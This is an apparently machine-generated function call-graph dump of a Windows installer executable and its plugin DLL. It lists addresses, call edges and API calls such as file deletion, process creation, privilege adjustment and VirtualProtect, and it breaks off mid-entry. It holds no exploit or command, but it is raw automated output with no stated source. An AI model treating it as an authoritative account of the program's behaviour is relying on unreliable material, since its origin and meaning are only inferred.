6d0e1020 5069 6d0e1027 GlobalAlloc 5068->5069 5070 6d0e1024 5068->5070 5069->5070 5071 6d0e1572 3 API calls 5070->5071 5072 6d0e1019 5071->5072 5075 6d0e1551 5073->5075 5074 6d0e1557 5074->5068 5075->5074 5076 6d0e1563 GlobalFree 5075->5076 5076->5068 5077 4027cf 5078 402c5e 21 API calls 5077->5078 5079 4027d6 FindFirstFileA 5078->5079 5080 4027f9 5079->5080 5081 4027e9 5079->5081 5085 4061eb wsprintfA 5080->5085 5083 402800 5086 40628d lstrcpynA 5083->5086 5085->5083 5086->5081 5087 401c53 5088 402c3c 21 API calls 5087->5088 5089 401c5a 5088->5089 5090 402c3c 21 API calls 5089->5090 5091 401c67 5090->5091 5092 401c7c 5091->5092 5093 402c5e 21 API calls 5091->5093 5094 401c8c 5092->5094 5095 402c5e 21 API calls 5092->5095 5093->5092 5096 401ce3 5094->5096 5097 401c97 5094->5097 5095->5094 5098 402c5e 21 API calls 5096->5098 5099 402c3c 21 API calls 5097->5099 5100 401ce8 5098->5100 5101 401c9c 5099->5101 5102 402c5e 21 API calls 5100->5102 5103 402c3c 21 API calls 5101->5103 5105 401cf1 FindWindowExA 5102->5105 5104 401ca8 5103->5104 5106 401cd3 SendMessageA 5104->5106 5107 401cb5 SendMessageTimeoutA 5104->5107 5108 401d0f 5105->5108 5106->5108 5107->5108 5109 402653 5110 402658 5109->5110 5111 40266c 5109->5111 5113 402c3c 21 API calls 5110->5113 5112 402c5e 21 API calls 5111->5112 5114 402673 lstrlenA 5112->5114 5115 402661 5113->5115 5114->5115 5116 402695 5115->5116 5117 405ec7 WriteFile 5115->5117 5117->5116 5118 403a54 5119 403a5f 5118->5119 5120 403a63 5119->5120 5121 403a66 GlobalAlloc 5119->5121 5121->5120 5122 405354 5123 405368 IsWindowVisible 5122->5123 5124 405358 5122->5124 5126 4053b2 5123->5126 5127 40537e 5123->5127 5125 404379 SendMessageA 5124->5125 5129 405365 5125->5129 5128 4053b7 CallWindowProcA 5126->5128 5133 404c80 SendMessageA 5127->5133 5128->5129 5131 405388 5131->5128 5138 404d00 5131->5138 5134 404ca3 GetMessagePos ScreenToClient SendMessageA 5133->5134 5135 404cdf SendMessageA 5133->5135 5136 404cdc 5134->5136 5137 404cd7 5134->5137 5135->5137 5136->5135 5137->5131 5147 40628d lstrcpynA 5138->5147 5140 404d13 5148 4061eb wsprintfA 5140->5148 5142 404d1d 5143 40140b 2 API calls 5142->5143 5144 404d26 5143->5144 5149 40628d lstrcpynA 5144->5149 5146 404d2d 5146->5126 5147->5140 5148->5142 5149->5146 4389 4014d6 4394 402c3c 4389->4394 4391 4014dc Sleep 4393 402aea 4391->4393 4395 406320 21 API calls 4394->4395 4396 402c51 4395->4396 4396->4391 4397 401957 4398 401959 4397->4398 4399 402c5e 21 API calls 4398->4399 4400 40195e 4399->4400 4403 405a4f 4400->4403 4443 405d0d 4403->4443 4406 405a77 DeleteFileA 4408 401967 4406->4408 4407 405a8e 4409 405bc6 4407->4409 4457 40628d lstrcpynA 4407->4457 4409->4408 4414 406620 2 API calls 4409->4414 4411 405ab4 4412 405ac7 4411->4412 4413 405aba lstrcatA 4411->4413 4458 405c66 lstrlenA 4412->4458 4415 405acd 4413->4415 4417 405be0 4414->4417 4418 405adb lstrcatA 4415->4418 4420 405ae6 lstrlenA FindFirstFileA 4415->4420 4417->4408 4419 405be4 4417->4419 4418->4420 4471 405c1f lstrlenA CharPrevA 4419->4471 4422 405bbc 4420->4422 4441 405b0a 4420->4441 4422->4409 4424 405c4a CharNextA 4424->4441 4425 405a07 5 API calls 4426 405bf6 4425->4426 4427 405c10 4426->4427 4428 405bfa 4426->4428 4429 4053d1 28 API calls 4427->4429 4428->4408 4433 4053d1 28 API calls 4428->4433 4429->4408 4430 405b9b FindNextFileA 4432 405bb3 FindClose 4430->4432 4430->4441 4432->4422 4434 405c07 4433->4434 4435 406066 40 API calls 4434->4435 4438 405c0e 4435->4438 4437 405a4f 64 API calls 4437->4441 4438->4408 4439 4053d1 28 API calls 4439->4430 4440 4053d1 28 API calls 4440->4441 4441->4424 4441->4430 4441->4437 4441->4439 4441->4440 4442 406066 40 API calls 4441->4442 4462 40628d lstrcpynA 4441->4462 4463 405a07 4441->4463 4442->4441 4474 40628d lstrcpynA 4443->4474 4445 405d1e 4475 405cb8 CharNextA CharNextA 4445->4475 4448 405a6f 4448->4406 4448->4407 4449 406587 5 API calls 4455 405d34 4449->4455 4450 405d5f lstrlenA 4451 405d6a 4450->4451 4450->4455 4452 405c1f 3 API calls 4451->4452 4454 405d6f GetFileAttributesA 4452->4454 4453 406620 2 API calls 4453->4455 4454->4448 4455->4448 4455->4450 4455->4453 4456 405c66 2 API calls 4455->4456 4456->4450 4457->4411 4459 405c73 4458->4459 4460 405c84 4459->4460 4461 405c78 CharPrevA 4459->4461 4460->4415 4461->4459 4461->4460 4462->4441 4481 405dfb GetFileAttributesA 4463->4481 4466 405a22 RemoveDirectoryA 4468 405a30 4466->4468 4467 405a2a DeleteFileA 4467->4468 4469 405a34 4468->4469 4470 405a40 SetFileAttributesA 4468->4470 4469->4441 4470->4469 4472 405bea 4471->4472 4473 405c39 lstrcatA 4471->4473 4472->4425 4473->4472 4474->4445 4476 405cd3 4475->4476 4478 405ce3 4475->4478 4476->4478 4479 405cde CharNextA 4476->4479 4477 405d03 4477->4448 4477->4449 4478->4477 4480 405c4a CharNextA 4478->4480 4479->4477 4480->4478 4482 405a13 4481->4482 4483 405e0d SetFileAttributesA 4481->4483 4482->4466 4482->4467 4482->4469 4483->4482 4484 4033d8 SetErrorMode GetVersionExA 4485 40342a GetVersionExA 4484->4485 4487 403469 4484->4487 4486 403446 4485->4486 4485->4487 4486->4487 4488 4034ed 4487->4488 4489 4066b5 5 API calls 4487->4489 4490 406647 3 API calls 4488->4490 4489->4488 4491 403503 lstrlenA 4490->4491 4491->4488 4492 403513 4491->4492 4493 4066b5 5 API calls 4492->4493 4494 40351a 4493->4494 4495 4066b5 5 API calls 4494->4495 4496 403521 4495->4496 4497 4066b5 5 API calls 4496->4497 4501 40352d #17 OleInitialize SHGetFileInfoA 4497->4501 4500 40357b GetCommandLineA 4574 40628d lstrcpynA 4500->4574 4573 40628d lstrcpynA 4501->4573 4503 40358d 4504 405c4a CharNextA 4503->4504 4505 4035b4 CharNextA 4504->4505 4513 4035c3 4505->4513 4506 403689 4507 40369d GetTempPathA 4506->4507 4575 4033a7 4507->4575 4509 4036b5 4510 4036b9 GetWindowsDirectoryA lstrcatA 4509->4510 4511 40370f DeleteFileA 4509->4511 4514 4033a7 12 API calls 4510->4514 4585 402f31 GetTickCount GetModuleFileNameA 4511->4585 4512 405c4a CharNextA 4512->4513 4513->4506 4513->4512 4517 40368b 4513->4517 4516 4036d5 4514->4516 4516->4511 4519 4036d9 GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 4516->4519 4669 40628d lstrcpynA 4517->4669 4518 403722 4520 4037b7 4518->4520 4523 4037a7 4518->4523 4528 405c4a CharNextA 4518->4528 4522 4033a7 12 API calls 4519->4522 4672 4039bc 4520->4672 4526 403707 4522->4526 4613 403a96 4523->4613 4526->4511 4526->4520 4531 40373c 4528->4531 4529 4037d1 4679 4059a3 4529->4679 4530 403928 4533 403930 GetCurrentProcess OpenProcessToken 4530->4533 4534 4039a6 ExitProcess 4530->4534 4536 403781 4531->4536 4537 4037e6 4531->4537 4539 403976 4533->4539 4540 403947 LookupPrivilegeValueA AdjustTokenPrivileges 4533->4540 4542 405d0d 18 API calls 4536->4542 4683 40590e 4537->4683 4541 4066b5 5 API calls 4539->4541 4540->4539 4544 40397d 4541->4544 4545 40378d 4542->4545 4547 403992 ExitWindowsEx 4544->4547 4549 40399f 4544->4549 4545->4520 4670 40628d lstrcpynA 4545->4670 4547->4534 4547->4549 4697 40140b 4549->4697 4551 403803 4554 40381b 4551->4554 4687 40628d lstrcpynA 4551->4687 4553 40379c 4671 40628d lstrcpynA 4553->4671 4557 403839 wsprintfA 4554->4557 4570 403867 4554->4570 4558 406320 21 API calls 4557->4558 4558->4554 4561 403877 GetFileAttributesA 4563 403883 DeleteFileA 4561->4563 4561->4570 4562 4038af SetCurrentDirectoryA 4564 406066 40 API calls 4562->4564 4563->4570 4565 4038be CopyFileA 4564->4565 4565->4520 4565->4570 4566 405a4f 71 API calls 4566->4570 4567 406066 40 API calls 4567->4570 4568 406320 21 API calls 4568->4570 4570->4520 4570->4554 4570->4557 4570->4561 4570->4562 4570->4566 4570->4567 4570->4568 4571 403918 CloseHandle 4570->4571 4572 406620 2 API calls 4570->4572 4688 405897 CreateDirectoryA 4570->4688 4691 4058f1 CreateDirectoryA 4570->4691 4694 405926 CreateProcessA 4570->4694 4571->4520 4572->4570 4573->4500 4574->4503 4576 406587 5 API calls 4575->4576 4578 4033b3 4576->4578 4577 4033bd 4577->4509 4578->4577 4579 405c1f 3 API calls 4578->4579 4580 4033c5 4579->4580 4581 4058f1 2 API calls 4580->4581 4582 4033cb 4581->4582 4700 405e4f 4582->4700 4704 405e20 GetFileAttributesA CreateFileA 4585->4704 4587 402f71 4607 402f81 4587->4607 4705 40628d lstrcpynA 4587->4705 4589 402f97 4590 405c66 2 API calls 4589->4590 4591 402f9d 4590->4591 4706 40628d lstrcpynA 4591->4706 4593 402fa8 GetFileSize 4594 4030a2 4593->4594 4595 402fbf 4593->4595 4707 402ecd 4594->4707 4595->4594 4602 40310e 4595->4602 4595->4607 4610 402ecd 6 API calls 4595->4610 4739 40337a 4595->4739 4597 4030ab 4599 4030db GlobalAlloc 4597->4599 4597->4607 4742 403390 SetFilePointer 4597->4742 4718 403390 SetFilePointer 4599->4718 4604 402ecd 6 API calls 4602->4604 4603 4030f6 4719 403168 4603->4719 4604->4607 4605 4030c4 4608 40337a ReadFile 4605->4608 4607->4518 4611 4030cf 4608->4611 4610->4595 4611->4599 4611->4607 4612 40313f SetFilePointer 4612->4607 4614 4066b5 5 API calls 4613->4614 4615 403aaa 4614->4615 4616 403ab0 4615->4616 4617 403ac2 4615->4617 4756 4061eb wsprintfA 4616->4756 4618 406174 3 API calls 4617->4618 4619 403aed 4618->4619 4620 403b0b lstrcatA 4619->4620 4622 406174 3 API calls 4619->4622 4623 403ac0 4620->4623 4622->4620 4748 403d5b 4623->4748 4626 405d0d 18 API calls 4627 403b3d 4626->4627 4628 403bc6 4627->4628 4630 406174 3 API calls 4627->4630 4629 405d0d 18 API calls 4628->4629 4631 403bcc 4629->4631 4632 403b69 4630->4632 4633 403bdc LoadImageA 4631->4633 4634 406320 21 API calls 4631->4634 4632->4628 4640 403b85 lstrlenA 4632->4640 4641 405c4a CharNextA 4632->4641 4635 403c82 4633->4635 4636 403c03 RegisterClassA 4633->4636 4634->4633 4639 40140b 2 API calls 4635->4639 4637 403c8c 4636->4637 4638 403c39 SystemParametersInfoA CreateWindowExA 4636->4638 4637->4520 4638->4635 4644 403c88 4639->4644 4642 403b93 lstrcmpiA 4640->4642 4643 403bb9 4640->4643 4645 403b83 4641->4645 4642->4643 4646 403ba3 GetFileAttributesA 4642->4646 4647 405c1f 3 API calls 4643->4647 4644->4637 4649 403d5b 22 API calls 4644->4649 4645->4640 4648 403baf 4646->4648 4650 403bbf 4647->4650 4648->4643 4651 405c66 2 API calls 4648->4651 4652 403c99 4649->4652 4757 40628d lstrcpynA 4650->4757 4651->4643 4654 403ca5 ShowWindow 4652->4654 4655 403d28 4652->4655 4657 406647 3 API calls 4654->4657 4656 4054a3 5 API calls 4655->4656 4658 403d2e 4656->4658 4659 403cbd 4657->4659 4660 403d32 4658->4660 4661 403d4a 4658->4661 4662 403ccb GetClassInfoA 4659->4662 4666 406647 3 API calls 4659->4666 4660->4637 4668 40140b 2 API calls 4660->4668 4665 40140b 2 API calls 4661->4665 4663 403cf5 DialogBoxParamA 4662->4663 4664 403cdf GetClassInfoA RegisterClassA 4662->4664 4667 40140b 2 API calls 4663->4667 4664->4663 4665->4637 4666->4662 4667->4637 4668->4637 4669->4507 4670->4553 4671->4523 4673 4039d4 4672->4673 4674 4039c6 CloseHandle 4672->4674 4762 403a01 4673->4762 4674->4673 4677 405a4f 71 API calls 4678 4037bf OleUninitialize 4677->4678 4678->4529 4678->4530 4680 4059b8 4679->4680 4681 4037de ExitProcess 4680->4681 4682 4059cc MessageBoxIndirectA 4680->4682 4682->4681 4684 4066b5 5 API calls 4683->4684 4685 4037eb lstrlenA 4684->4685 4686 40628d lstrcpynA 4685->4686 4686->4551 4687->4554 4689 4058e3 4688->4689 4690 4058e7 GetLastError 4688->4690 4689->4570 4690->4689 4692 405901 4691->4692 4693 405905 GetLastError 4691->4693 4692->4570 4693->4692 4695 405965 4694->4695 4696 405959 CloseHandle 4694->4696 4695->4570 4696->4695 4698 401389 2 API calls 4697->4698 4699 401420 4698->4699 4699->4534 4701 405e5a GetTickCount GetTempFileNameA 4700->4701 4702 4033d6 4701->4702 4703 405e87 4701->4703 4702->4509 4703->4701 4703->4702 4704->4587 4705->4589 4706->4593 4708 402ed6 4707->4708 4709 402eee 4707->4709 4710 402ee6 4708->4710 4711 402edf DestroyWindow 4708->4711 4712 402ef6 4709->4712 4713 402efe GetTickCount 4709->4713 4710->4597 4711->4710 4743 4066f1 4712->4743 4714 402f0c CreateDialogParamA ShowWindow 4713->4714 4715 402f2f 4713->4715 4714->4715 4715->4597 4718->4603 4720 40317e 4719->4720 4721 4031ac 4720->4721 4747 403390 SetFilePointer 4720->4747 4723 40337a ReadFile 4721->4723 4724 4031b7 4723->4724 4725 403313 4724->4725 4726 4031c9 GetTickCount 4724->4726 4728 403102 4724->4728 4727 403355 4725->4727 4732 403317 4725->4732 4726->4728 4735 403218 4726->4735 4729 40337a ReadFile 4727->4729 4728->4607 4728->4612 4729->4728 4730 40337a ReadFile 4730->4735 4731 40337a ReadFile 4731->4732 4732->4728 4732->4731 4733 405ec7 WriteFile 4732->4733 4733->4732 4734 40326e GetTickCount 4734->4735 4735->4728 4735->4730 4735->4734 4736 403293 MulDiv wsprintfA 4735->4736 4738 405ec7 WriteFile 4735->4738 4737 4053d1 28 API calls 4736->4737 4737->4735 4738->4735 4740 405e98 ReadFile 4739->4740 4741 40338d 4740->4741 4741->4595 4742->4605 4744 40670e PeekMessageA 4743->4744 4745 406704 DispatchMessageA 4744->4745 4746 402efc 4744->4746 4745->4744 4746->4597 4747->4721 4749 403d6f 4748->4749 4758 4061eb wsprintfA 4749->4758 4751 403de0 4759 403e14 4751->4759 4753 403b1b 4753->4626 4754 403de5 4754->4753 4755 406320 21 API calls 4754->4755 4755->4754 4756->4623 4757->4628 4758->4751 4760 406320 21 API calls 4759->4760 4761 403e22 SetWindowTextA 4760->4761 4761->4754 4763 403a0f 4762->4763 4764 4039d9 4763->4764 4765 403a14 FreeLibrary GlobalFree 4763->4765 4764->4677 4765->4764 4765->4765 4766 402758 4767 402a6c 4766->4767 4768 40275f 4766->4768 4769 402c3c 21 API calls 4768->4769 4770 402766 4769->4770 4771 402775 SetFilePointer 4770->4771 4771->4767 4772 402785 4771->4772 4774 4061eb wsprintfA 4772->4774 4774->4767 5150 401e5a GetDC 5151 402c3c 21 API calls 5150->5151 5152 401e6c GetDeviceCaps MulDiv ReleaseDC 5151->5152 5153 402c3c 21 API calls 5152->5153 5154 401e9d 5153->5154 5155 406320 21 API calls 5154->5155 5156 401eda CreateFontIndirectA 5155->5156 5157 40264d 5156->5157 4800 4015e0 4801 402c5e 21 API calls 4800->4801 4802 4015e7 4801->4802 4803 405cb8 4 API calls 4802->4803 4808 4015ef 4803->4808 4804 401649 4806 401677 4804->4806 4807 40164e 4804->4807 4805 405c4a CharNextA 4805->4808 4810 401423 28 API calls 4806->4810 4809 401423 28 API calls 4807->4809 4808->4804 4808->4805 4813 4058f1 2 API calls 4808->4813 4814 40590e 5 API calls 4808->4814 4817 401631 GetFileAttributesA 4808->4817 4818 405897 2 API calls 4808->4818 4811 401655 4809->4811 4816 40166f 4810->4816 4819 40628d lstrcpynA 4811->4819 4813->4808 4814->4808 4815 401660 SetCurrentDirectoryA 4815->4816 4817->4808 4818->4808 4819->4815 5158 4016e0 5159 402c5e 21 API calls 5158->5159 5160 4016e6 GetFullPathNameA 5159->5160 5161 40171e 5160->5161 5162 4016fd 5160->5162 5163 401732 GetShortPathNameA 5161->5163 5164 402aea 5161->5164 5162->5161 5165 406620 2 API calls 5162->5165 5163->5164 5166 40170e 5165->5166 5166->5161 5168 40628d lstrcpynA 5166->5168 5168->5161 5169 404463 lstrcpynA lstrlenA 4866 405969 ShellExecuteExA 5170 405369 5171 405371 IsWindowVisible 5170->5171 5177 405388 5170->5177 5172 4053b2 5171->5172 5173 40537e 5171->5173 5174 4053b7 CallWindowProcA 5172->5174 5175 404c80 5 API calls 5173->5175 5176 4053cb 5174->5176 5175->5177 5177->5174 5178 404d00 4 API calls 5177->5178 5178->5172 4867 401eea 4868 402c3c 21 API calls 4867->4868 4869 401ef0 4868->4869 4870 402c3c 21 API calls 4869->4870 4871 401efc 4870->4871 4872 401f13 EnableWindow 4871->4872 4873 401f08 ShowWindow 4871->4873 4874 402aea 4872->4874 4873->4874 4875 40176b 4876 402c5e 21 API calls 4875->4876 4877 401772 4876->4877 4878 405e4f 2 API calls 4877->4878 4879 401779 4878->4879 4880 405e4f 2 API calls 4879->4880 4880->4879 5179 40196c 5180 402c5e 21 API calls 5179->5180 5181 401973 lstrlenA 5180->5181 5182 40264d 5181->5182 5183 401ff0 5184 402c5e 21 API calls 5183->5184 5185 401ff7 5184->5185 5186 406620 2 API calls 5185->5186 5187 401ffd 5186->5187 5188 40200f 5187->5188 5190 4061eb wsprintfA 5187->5190 5190->5188 5191 6d0e103d 5192 6d0e101b 5 API calls 5191->5192 5193 6d0e1056 5192->5193 5194 4014f4 SetForegroundWindow 5195 402aea 5194->5195 5196 404778 5197 404788 5196->5197 5198 4047ae 5196->5198 5199 40432d 22 API calls 5197->5199 5200 404394 8 API calls 5198->5200 5201 404795 SetDlgItemTextA 5199->5201 5202 4047ba 5200->5202 5201->5198 4992 40177e 4993 402c5e 21 API calls 4992->4993 4994 401785 4993->4994 4995 4017a3 4994->4995 4996 4017ab 4994->4996 5032 40628d lstrcpynA 4995->5032 5033 40628d lstrcpynA 4996->5033 4999 4017a9 5002 406587 5 API calls 4999->5002 5000 4017b6 5001 405c1f 3 API calls 5000->5001 5003 4017bc lstrcatA 5001->5003 5006 4017c8 5002->5006 5003->4999 5004 406620 2 API calls 5004->5006 5005 401809 5007 405dfb 2 API calls 5005->5007 5006->5004 5006->5005 5009 4017df CompareFileTime 5006->5009 5010 4018a3 5006->5010 5011 40187a 5006->5011 5013 40628d lstrcpynA 5006->5013 5019 406320 21 API calls 5006->5019 5028 4059a3 MessageBoxIndirectA 5006->5028 5031 405e20 GetFileAttributesA CreateFileA 5006->5031 5007->5006 5009->5006 5012 4053d1 28 API calls 5010->5012 5015 4053d1 28 API calls 5011->5015 5021 40188f 5011->5021 5014 4018ad 5012->5014 5013->5006 5016 403168 35 API calls 5014->5016 5015->5021 5017 4018c0 5016->5017 5018 4018d4 SetFileTime 5017->5018 5020 4018e6 FindCloseChangeNotification 5017->5020 5018->5020 5019->5006 5020->5021 5022 4018f7 5020->5022 5023 4018fc 5022->5023 5024 40190f 5022->5024 5026 406320 21 API calls 5023->5026 5025 406320 21 API calls 5024->5025 5027 401917 5025->5027 5029 401904 lstrcatA 5026->5029 5027->5021 5030 4059a3 MessageBoxIndirectA 5027->5030 5028->5006 5029->5027 5030->5021 5031->5006 5032->4999 5033->5000 5203 40167e 5204 402c5e 21 API calls 5203->5204 5205 401684 5204->5205 5206 406620 2 API calls 5205->5206 5207 40168a 5206->5207 5208 40197e 5209 402c3c 21 API calls 5208->5209 5210 401985 5209->5210 5211 402c3c 21 API calls 5210->5211 5212 401992 5211->5212 5213 402c5e 21 API calls 5212->5213 5214 4019a9 lstrlenA 5213->5214 5216 4019b9 5214->5216 5215 4019f9 5216->5215 5220 40628d lstrcpynA 5216->5220 5218 4019e9 5218->5215 5219 4019ee lstrlenA 5218->5219 5219->5215 5220->5218 5034 6d0e29b1 5035 6d0e2a01 5034->5035 5036 6d0e29c1 VirtualProtect 5034->5036 5036->5035 5221 401000 5222 401037 BeginPaint GetClientRect 5221->5222 5224 40100c DefWindowProcA 5221->5224 5225 4010f3 5222->5225 5226 401179 5224->5226 5227 401073 CreateBrushIndirect FillRect DeleteObject 5225->5227 5228 4010fc 5225->5228 5227->5225 5229 401102 CreateFontIndirectA 5228->5229 5230 401167 EndPaint 5228->5230 5229->5230 5231 401112 6 API calls 5229->5231 5230->5226 5231->5230 5232 401502 5233 401507 5232->5233 5235 40152d 5232->5235 5234 402c3c 21 API calls 5233->5234 5234->5235 5236 401a83 5237 402c3c 21 API calls 5236->5237 5238 401a8c 5237->5238 5239 402c3c 21 API calls 5238->5239 5240 401a33 5239->5240 5241 6d0e16c8 5242 6d0e16f7 5241->5242 5243 6d0e1b28 18 API calls 5242->5243 5244 6d0e16fe 5243->5244 5245 6d0e1705 5244->5245 5246 6d0e1711 5244->5246 5247 6d0e12f6 2 API calls 5245->5247 5248 6d0e171b 5246->5248 5249 6d0e1738 5246->5249 5252 6d0e170f 5247->5252 5253 6d0e1572 3 API calls 5248->5253 5250 6d0e173e 5249->5250 5251 6d0e1762 5249->5251 5255 6d0e15e9 3 API calls 5250->5255 5256 6d0e1572 3 API calls 5251->5256 5254 6d0e1720 5253->5254 5257 6d0e15e9 3 API calls 5254->5257 5258 6d0e1743 5255->5258 5256->5252 5259 6d0e1726 5257->5259 5260 6d0e12f6 2 API calls 5258->5260 5261 6d0e12f6 2 API calls 5259->5261 5262 6d0e1749 GlobalFree 5260->5262 5263 6d0e172c GlobalFree 5261->5263 5262->5252 5264 6d0e175d GlobalFree 5262->5264 5263->5252 5264->5252 5265 401588 5266 402a67 5265->5266 5269 4061eb wsprintfA 5266->5269 5268 402a6c 5269->5268 5270 401b88 5271 402c5e 21 API calls 5270->5271 5272 401b8f 5271->5272 5273 402c3c 21 API calls 5272->5273 5274 401b98 wsprintfA 5273->5274 5275 402aea 5274->5275 5276 6d0e18c7 5277 6d0e18ea 5276->5277 5278 6d0e191a GlobalFree 5277->5278 5279 6d0e192c 5277->5279 5278->5279 5280 6d0e12f6 2 API calls 5279->5280 5281 6d0e1aae GlobalFree GlobalFree 5280->5281 5282 401d8a 5283 401d90 5282->5283 5284 401d9d GetDlgItem 5282->5284 5285 402c3c 21 API calls 5283->5285 5286 401d97 5284->5286 5285->5286 5288 402c5e 21 API calls 5286->5288 5290 401dde GetClientRect LoadImageA SendMessageA 5286->5290 5288->5290 5289 401e3f 5291 401e44 DeleteObject 5289->5291 5292 401e4b 5289->5292 5290->5289 5290->5292 5291->5292 5293 40278b 5294 402791 5293->5294 5295 402799 FindClose 5294->5295 5296 402aea 5294->5296 5295->5296 4209 40240d 4210 402c5e 21 API calls 4209->4210 4211 40241e 4210->4211 4212 402c5e 21 API calls 4211->4212 4213 402427 4212->4213 4214 402c5e 21 API calls 4213->4214 4215 402431 GetPrivateProfileStringA 4214->4215 5297 40280d 5298 402c5e 21 API calls 5297->5298 5299 402819 5298->5299 5300 40282f 5299->5300 5302 402c5e 21 API calls 5299->5302 5301 405dfb 2 API calls 5300->5301 5303 402835 5301->5303 5302->5300 5325 405e20 GetFileAttributesA CreateFileA 5303->5325 5305 402842 5306 4028fe 5305->5306 5307 4028e6 5305->5307 5308 40285d GlobalAlloc 5305->5308 5309 402905 DeleteFileA 5306->5309 5310 402918 5306->5310 5312 403168 35 API calls 5307->5312 5308->5307 5311 402876 5308->5311 5309->5310 5326 403390 SetFilePointer 5311->5326 5314 4028f3 CloseHandle 5312->5314 5314->5306 5315 40287c 5316 40337a ReadFile 5315->5316 5317 402885 GlobalAlloc 5316->5317 5318 402895 5317->5318 5319 4028cf 5317->5319 5321 403168 35 API calls 5318->5321 5320 405ec7 WriteFile 5319->5320 5322 4028db GlobalFree 5320->5322 5323 4028a2 5321->5323 5322->5307 5324 4028c6 GlobalFree 5323->5324 5324->5319 5325->5305 5326->5315 4247 40550f 4248 405531 GetDlgItem GetDlgItem GetDlgItem 4247->4248 4249 4056ba 4247->4249 4293 404362 SendMessageA 4248->4293 4251 4056c2 GetDlgItem CreateThread FindCloseChangeNotification 4249->4251 4252 4056ea 4249->4252 4251->4252 4316 4054a3 OleInitialize 4251->4316 4254 405718 4252->4254 4255 405700 ShowWindow ShowWindow 4252->4255 4256 405739 4252->4256 4253 4055a1 4259 4055a8 GetClientRect GetSystemMetrics SendMessageA SendMessageA 4253->4259 4257 405720 4254->4257 4258 405773 4254->4258 4298 404362 SendMessageA 4255->4298 4302 404394 4256->4302 4261 405728 4257->4261 4262 40574c ShowWindow 4257->4262 4258->4256 4266 405780 SendMessageA 4258->4266 4264 405616 4259->4264 4265 4055fa SendMessageA SendMessageA 4259->4265 4299 404306 4261->4299 4269 40576c 4262->4269 4270 40575e 4262->4270 4273 405629 4264->4273 4274 40561b SendMessageA 4264->4274 4265->4264 4268 405745 4266->4268 4275 405799 CreatePopupMenu 4266->4275 4272 404306 SendMessageA 4269->4272 4271 4053d1 28 API calls 4270->4271 4271->4269 4272->4258 4294 40432d 4273->4294 4274->4273 4276 406320 21 API calls 4275->4276 4278 4057a9 AppendMenuA 4276->4278 4280 4057c7 GetWindowRect 4278->4280 4281 4057da TrackPopupMenu 4278->4281 4279 405639 4282 405642 ShowWindow 4279->4282 4283 405676 GetDlgItem SendMessageA 4279->4283 4280->4281 4281->4268 4285 4057f6 4281->4285 4286 405658 ShowWindow 4282->4286 4288 405665 4282->4288 4283->4268 4284 40569d SendMessageA SendMessageA 4283->4284 4284->4268 4287 405815 SendMessageA 4285->4287 4286->4288 4287->4287 4289 405832 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4287->4289 4297 404362 SendMessageA 4288->4297 4291 405854 SendMessageA 4289->4291 4291->4291 4292 405876 GlobalUnlock SetClipboardData CloseClipboard 4291->4292 4292->4268 4293->4253 4295 406320 21 API calls 4294->4295 4296 404338 SetDlgItemTextA 4295->4296 4296->4279 4297->4283 4298->4254 4300 404313 SendMessageA 4299->4300 4301 40430d 4299->4301 4300->4256 4301->4300 4303 404457 4302->4303 4304 4043ac GetWindowLongA 4302->4304 4303->4268 4304->4303 4305 4043c1 4304->4305 4305->4303 4306 4043f1 4305->4306 4307 4043ee GetSysColor 4305->4307 4308 404401 SetBkMode 4306->4308 4309 4043f7 SetTextColor 4306->4309 4307->4306 4310 404419 GetSysColor 4308->4310 4311 40441f 4308->4311 4309->4308 4310->4311 4312 404426 SetBkColor 4311->4312 4313 404430 4311->4313 4312->4313 4313->4303 4314 404443 DeleteObject 4313->4314 4315 40444a CreateBrushIndirect 4313->4315 4314->4315 4315->4303 4323 404379 4316->4323 4318 404379 SendMessageA 4319 4054ff OleUninitialize 4318->4319 4320 4054c6 4322 4054ed 4320->4322 4326 401389 4320->4326 4322->4318 4324 404391 4323->4324 4325 404382 SendMessageA 4323->4325 4324->4320 4325->4324 4328 401390 4326->4328 4327 4013fe 4327->4320 4328->4327 4329 4013cb MulDiv SendMessageA 4328->4329 4329->4328 4330 40168f 4331 402c5e 21 API calls 4330->4331 4332 401696 4331->4332 4333 402c5e 21 API calls 4332->4333 4334 40169f 4333->4334 4335 402c5e 21 API calls 4334->4335 4336 4016a8 MoveFileA 4335->4336 4337 4016bb 4336->4337 4343 4016b4 4336->4343 4341 40230f 4337->4341 4344 406620 FindFirstFileA 4337->4344 4339 401423 28 API calls 4339->4341 4343->4339 4345 4016ca 4344->4345 4346 406636 FindClose 4344->4346 4345->4341 4347 406066 MoveFileExA 4345->4347 4346->4345 4348 40607a 4347->4348 4350 406087 4347->4350 4351 405ef6 4348->4351 4350->4343 4352 405f42 GetShortPathNameA 4351->4352 4353 405f1c 4351->4353 4355 406061 4352->4355 4356 405f57 4352->4356 4378 405e20 GetFileAttributesA CreateFileA 4353->4378 4355->4350 4356->4355 4358 405f5f wsprintfA 4356->4358 4357 405f26 CloseHandle GetShortPathNameA 4357->4355 4359 405f3a 4357->4359 4360 406320 21 API calls 4358->4360 4359->4352 4359->4355 4361 405f87 4360->4361 4379 405e20 GetFileAttributesA CreateFileA 4361->4379 4363 405f94 4363->4355 4364 405fa3 GetFileSize GlobalAlloc 4363->4364 4365 405fc5 4364->4365 4366 40605a CloseHandle 4364->4366 4380 405e98 ReadFile 4365->4380 4366->4355 4371 405fe4 lstrcpyA 4373 406006 4371->4373 4372 405ff8 4374 405d85 4 API calls 4372->4374 4375 40603d SetFilePointer 4373->4375 4374->4373 4387 405ec7 WriteFile 4375->4387 4378->4357 4379->4363 4381 405eb6 4380->4381 4381->4366 4382 405d85 lstrlenA 4381->4382 4383 405dc6 lstrlenA 4382->4383 4384 405dce 4383->4384 4385 405d9f lstrcmpiA 4383->4385 4384->4371 4384->4372 4385->4384 4386 405dbd CharNextA 4385->4386 4386->4383 4388 405ee5 GlobalFree 4387->4388 4388->4366 5327 401490 5328 4053d1 28 API calls 5327->5328 5329 401497 5328->5329 5330 404b10 5331 404b20 5330->5331 5332 404b3c 5330->5332 5341 405987 GetDlgItemTextA 5331->5341 5334 404b42 SHGetPathFromIDListA 5332->5334 5335 404b6f 5332->5335 5337 404b52 5334->5337 5340 404b59 SendMessageA 5334->5340 5336 404b2d SendMessageA 5336->5332 5338 40140b 2 API calls 5337->5338 5338->5340 5340->5335 5341->5336 5342 401a12 5343 402c5e 21 API calls 5342->5343 5344 401a19 5343->5344 5345 402c5e 21 API calls 5344->5345 5346 401a22 5345->5346 5347 401a29 lstrcmpiA 5346->5347 5348 401a3b lstrcmpA 5346->5348 5349 